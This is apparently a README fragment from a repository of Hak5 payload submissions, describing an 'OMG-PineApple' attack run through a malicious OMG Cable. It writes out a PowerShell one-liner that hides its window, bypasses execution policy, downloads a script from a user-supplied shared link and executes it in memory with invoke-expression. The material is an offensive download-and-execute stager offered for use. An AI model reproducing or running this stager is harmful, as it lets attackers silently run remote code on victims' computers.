I-Am-Jakoby/hak5-submissions/OMG-PineApple/README.md

 * Plug in OMG Cable
 * Either the entire script will be manually entered into the powershell window or
 * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* PS1 file to download is provided above
 ```
 powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
 ```